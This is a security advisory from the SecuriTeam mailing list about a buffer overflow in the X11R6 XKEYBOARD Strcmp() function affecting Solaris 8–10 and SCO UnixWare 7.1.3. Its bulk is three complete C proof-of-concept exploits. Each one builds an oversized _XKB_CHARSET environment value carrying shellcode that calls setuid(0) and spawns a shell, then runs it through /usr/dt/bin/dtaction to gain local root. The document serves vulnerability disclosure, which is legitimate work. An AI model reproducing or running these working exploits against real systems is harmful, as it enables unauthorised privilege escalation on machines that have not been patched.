[UNIX] X11R6 XKEYBOARD Extension strcmp() Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



X11R6 XKEYBOARD Extension strcmp() Buffer Overflow
------------------------------------------------------------------------


SUMMARY

There is a silently fixed vulnerability within a string manipulation
function of the X11R6 X Window System library, which when properly
exploited can lead to local compromise of the vulnerable system.

DETAILS

Vulnerable Systems:
* X11 R6.4 and prior.
* Some later versions as well.

This vulnerability was silently fixed in X11R6.5.1 release, but it is
still present in multiple vendors operating systems source tree. This
vulnerability was confirmed by RISE Security in the following versions and
operating systems, other versions and operating systems may be also
affected.

* Sun Solaris 10 SPARC/x86
* Sun Solaris 9 SPARC/x86
* Sun Solaris 8 SPARC/x86
* SCO UnixWare 7.1.3

This vulnerability can be triggered by invoking a dynamicaly linked
binary, with _XKB_CHARSET environment variable set to a long string value,
and DISPLAY environment variable set to a X Window System server with the
XKEYBOARD extension enabled. This is the vulnerable function (from
X11R6.4).

static int
#if NeedFunctionPrototypes
Strcmp(char *str1, char *str2)
#else
Strcmp(str1, str2)
char *str1, *str2;
#endif
{
char str[256];
char c, *s;

for (s = str; c = *str1++; ) {
if (isupper(c))
c = tolower(c);
*s++ = c;
}
*s = '\0';
return (strcmp(str, str2));
}

Vendor Status:
Sun has released patches for this vulnerability, the Sun Alert ID is
<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1>
102570.
SCO did not answer to our email.

Credit:
This vulnerability was discovered by Adriano Lima and
Filipe Balestra .

Proof of concept:

sol-sparc-xkb.c:
/*
* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC
* Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>,
* Ramon de Carvalho Valle <ramon@xxxxxxxxxxxxxxxx>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
*
*/

/*
* Compile with the following command.
* $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c
*
* Set the DISPLAY environment variable to a X Window System server with
* XKEYBOARD extension enabled.
* $ ./sol-sparc-xkb sprintf|strcpy xserver:display
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dlfcn.h>
#include <link.h>
#include <sys/systeminfo.h>
#include <procfs.h>

#define BUFSIZE 13+256+64+2+1
#define FRMSIZE 64+3+1
#define ADRSIZE 2047+1
#define SHLSIZE strlen(shellcode)+1
#define DSPSIZE strlen(display)+1
#define ARGSIZE 7+1
#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE
#define PFMSIZE strlen(platform)+1
#define PRGSIZE 20+1

#define PAD(a,b,c) \
a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);

char shellcode[]= /* 60 bytes */
"\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 0x08 */
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */
"\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */
"\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */
"\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */
"\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */
"\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */
"\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */
"\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */
"\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */
"\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */
"\x82\x10\x20\x3b" /* mov 0x3b,%g1 */
"\x91\xd0\x20\x08" /* ta 0x08 */
;

void *find_symbol(const char *symbol){
void *handle,*addr;
char *err;

if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){
fprintf(stderr,"%s\n",dlerror());
exit(EXIT_FAILURE);
}

dlerror();
addr=dlsym(handle,symbol);
if((err=dlerror())!=NULL){
fprintf(stderr,"%s\n",err);
exit(EXIT_FAILURE);
}

dlclose(handle);

return addr;
}

void *find_rwxmem(void){
FILE *fp;
prmap_t map;
int flags;
void *addr;

if((fp=fopen("/proc/self/map","rb"))==NULL){
perror("fopen");
exit(EXIT_FAILURE);
}

while(fread(&map,sizeof(map),1,fp)){
flags=map.pr_mflags;


if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){
if(flags&MA_STACK) continue;
addr=(void *)map.pr_vaddr;
}
}

fclose(fp);

return addr;
}

int main(int argc,char **argv){
char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;
int base,offset,i,flag=0;

printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10
SPARC\n");
printf("Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>\n\n");

if(argc!=3){
fprintf(stderr,"usage: %s sprintf|strcpy
xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}

if(!strcmp(argv[1],"sprintf")) flag=1;
if(!strcmp(argv[1],"strcpy")) flag=2;

if(!flag){
fprintf(stderr,"usage: %s sprintf|strcpy
xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}

snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);

if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){
perror("sysinfo");
exit(EXIT_FAILURE);
}

base=((int)argv[0]|0xffff);
base++;

offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;
PAD(offset,1,sizeof(envp)-1);

*((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;
*((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;
*((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;

switch(flag){
case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;
case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;
}

*((int *)addr[4])=(int)find_rwxmem()+4;
*((int *)addr[5])=*((int *)addr[4])-8;

p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<66;i++) *p++=addr[1][i%4];
*p='\0';

memcpy(buf+13+256+56,addr[0],4);
memcpy(buf+13+256+60,addr[3],4);

p=buf+1024;;
for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];
*p='\0';

memcpy(buf+1024+32,addr[4],4);
memcpy(buf+1024+36,addr[2],4);
memcpy(buf+1024+60,addr[5],4);

p=buf+2048;
for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];
*p='\0';

envp[0]=&buf[0];
envp[1]=&buf[1024];
envp[2]=&buf[2048];
envp[3]=shellcode;
envp[4]=display;
envp[5]=NULL;

execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);

exit(EXIT_FAILURE);
}

sol-x86-xkb.c:

/*
* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86
* Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>,
* Ramon de Carvalho Valle <ramon@xxxxxxxxxxxxxxxx>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ADRSIZE 1024
#define NOPSIZE 4096

char shellcode[]= /* 47 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xff\xd6" /* call *%esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;

int main(int argc,char **argv){
char buf[8192],display[256],addr[4],*envp[4],*p;
int i;

printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10
x86\n");
printf("Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>\n\n");

if(argc!=2){
fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}

snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);

*((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;

p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
for(i=0;i<NOPSIZE;i++) *p++='\x90';
for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
*p='\0';

envp[0]=buf;
envp[1]=display;
envp[2]=NULL;

execle("/usr/dt/bin/dtaction","dtaction",0,envp);

exit(EXIT_FAILURE);
}

sco-x86-xkb.c:

/*
* X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86
* Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>,
* Ramon de Carvalho Valle <ramon@xxxxxxxxxxxxxxxx>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ADRSIZE 1024
#define NOPSIZE 4096

char shellcode[]= /* 43 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xff\xd6" /* call *%esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;

int main(int argc,char **argv){
char buf[8192],display[256],addr[4],*envp[4],*p;
int i;

printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3
x86\n");
printf("Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>\n\n");

if(argc!=2){
fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}

snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);

*((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;

p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
for(i=0;i<NOPSIZE;i++) *p++='\x90';
for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
*p='\0';

envp[0]=buf;
envp[1]=display;
envp[2]=NULL;

execle("/usr/dt/bin/dtaction","dtaction",0,envp);

exit(EXIT_FAILURE);
}


ADDITIONAL INFORMATION

The information has been provided by
<mailto:http://www.risesecurity.org/> RISE Security.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages